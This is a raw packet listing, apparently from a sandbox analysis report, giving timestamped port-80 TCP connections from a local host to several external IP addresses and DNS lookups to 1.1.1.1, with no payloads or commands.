                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.325737953 CET5026680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.325953960 CET5026680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.329015970 CET5026680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.330774069 CET805026654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.333924055 CET805026654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.169245005 CET805026654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.169476986 CET5026680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.174783945 CET805026654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.174863100 CET5026680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.181771994 CET5026780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.186741114 CET805026744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.186939955 CET5026780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.187068939 CET5026780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.187068939 CET5026780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.192126036 CET805026744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.192150116 CET805026744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.857434034 CET805026744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.857645035 CET5026780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.863055944 CET805026744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.863117933 CET5026780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.869714022 CET5026880192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.874630928 CET8050268172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.874692917 CET5026880192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.874759912 CET5026880192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.874773979 CET5026880192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.879571915 CET8050268172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.879585028 CET8050268172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.538811922 CET8050268172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.538913012 CET5026880192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.539345980 CET5026880192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.540785074 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.544148922 CET8050268172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.545677900 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.545767069 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.545826912 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.545826912 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.550714970 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:58.550729990 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.206993103 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.207125902 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.207125902 CET5026980192.168.2.10172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.212289095 CET8050269172.234.222.143192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.226514101 CET5027080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.231918097 CET805027018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.232006073 CET5027080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.232089996 CET5027080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.232116938 CET5027080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.237512112 CET805027018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.237544060 CET805027018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.938610077 CET805026082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.938754082 CET5026080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.938783884 CET5026080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.943849087 CET805026082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.953339100 CET5027180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.958385944 CET805027182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.958508968 CET5027180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.958617926 CET5027180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.958632946 CET5027180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.963535070 CET805027182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.963551998 CET805027182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.690048933 CET805027018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.690304041 CET5027080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.695764065 CET805027018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.695835114 CET5027080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.723613977 CET5027280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.729387999 CET805027282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.729502916 CET5027280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.729619026 CET5027280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.729640961 CET5027280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.735440969 CET805027282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.736618996 CET805027282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:03.449778080 CET5027180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:03.451972961 CET5027380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:03.457161903 CET805027382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:03.457258940 CET5027380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:03.457592964 CET5027380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:03.457626104 CET5027380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:03.462513924 CET805027382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:03.462547064 CET805027382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.219086885 CET805027282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.219177008 CET5027280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.219284058 CET5027280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.221263885 CET5027480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.224291086 CET805027282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.226228952 CET805027482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.226311922 CET5027480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.226593018 CET5027480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.226655960 CET5027480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.231540918 CET805027482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:09.231570959 CET805027482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.932785034 CET805027382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.933000088 CET5027380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.933106899 CET5027380192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.938020945 CET805027382.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.950340986 CET5027580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.955297947 CET805027547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.955408096 CET5027580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.955566883 CET5027580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.955600977 CET5027580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.960494041 CET805027547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.960510969 CET805027547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:12.012547970 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:12.020170927 CET8050096208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:12.020323992 CET5009680192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.434638977 CET805027547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.434871912 CET5027580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.440260887 CET805027547.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.440334082 CET5027580192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.448369026 CET5027680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.453285933 CET805027613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.453385115 CET5027680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.453506947 CET5027680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.453517914 CET5027680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.458551884 CET805027613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.458564997 CET805027613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.920010090 CET805027613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.920221090 CET5027680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.925909042 CET805027613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.925995111 CET5027680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.027021885 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.032033920 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.036087990 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.036202908 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.036221027 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.041091919 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.041102886 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.721360922 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.721697092 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.727406979 CET805027744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.727487087 CET5027780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.737147093 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.742106915 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.742202997 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.742400885 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.742424011 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.747292042 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.747302055 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.211138010 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.211415052 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.217098951 CET805027818.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.217398882 CET5027880192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.709829092 CET805027482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.710037947 CET5027480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.710154057 CET5027480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.714988947 CET805027482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.721704960 CET5028080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.726641893 CET805028082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.726794004 CET5028080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.727005005 CET5028080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.727092981 CET5028080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.731779099 CET805028082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.731853008 CET805028082.112.184.197192.168.2.10

                                                                                                                                                                                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.262578011 CET5554553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.289922953 CET53555451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:28.437925100 CET5274153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:28.444885969 CET53527411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:30.149840117 CET5502253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:30.156903028 CET53550221.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:30.252301931 CET5426453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:30.259402037 CET53542641.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:32.928847075 CET5632753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:32.936779022 CET53563271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.050607920 CET5721253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.057365894 CET53572121.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.097707033 CET6105553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.787971020 CET53610551.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.673696995 CET5923053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.680777073 CET53592301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.157710075 CET5916153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.166402102 CET53591611.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:36.575900078 CET5732453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:36.583200932 CET53573241.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.165791988 CET5549853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.175905943 CET53554981.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.044739962 CET6293753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.052706003 CET53629371.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.309633970 CET6050953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.321055889 CET53605091.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.344249010 CET5307153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.351469040 CET53530711.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.352389097 CET6533753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.359621048 CET53653371.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.897211075 CET6240853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.905742884 CET53624081.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.906517029 CET6237453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.913444996 CET53623741.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.922405005 CET5471753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.930114031 CET53547171.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.386504889 CET5468853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.393667936 CET53546881.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.443006992 CET6239553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.451359034 CET53623951.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.414771080 CET6523953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.421801090 CET53652391.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.460711956 CET5065853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.467649937 CET53506581.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.472605944 CET5138153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.480128050 CET53513811.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.891488075 CET5690753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.898901939 CET53569071.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.633254051 CET6215653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.640888929 CET53621561.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.778592110 CET5306553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:12.791233063 CET5306553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.475440979 CET53530651.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.475475073 CET53530651.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.919965982 CET5149953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.927073002 CET53514991.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.204062939 CET5574553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.211215973 CET53557451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.788466930 CET6125953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.795874119 CET53612591.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.522500038 CET6132653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.529592037 CET53613261.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.800151110 CET5317953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.807409048 CET53531791.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.547219992 CET5762553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.554377079 CET53576251.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.600056887 CET5941053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.607156992 CET53594101.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.231096029 CET5559453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.238786936 CET53555941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.543577909 CET5649953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.551224947 CET53564991.1.1.1192.168.2.10
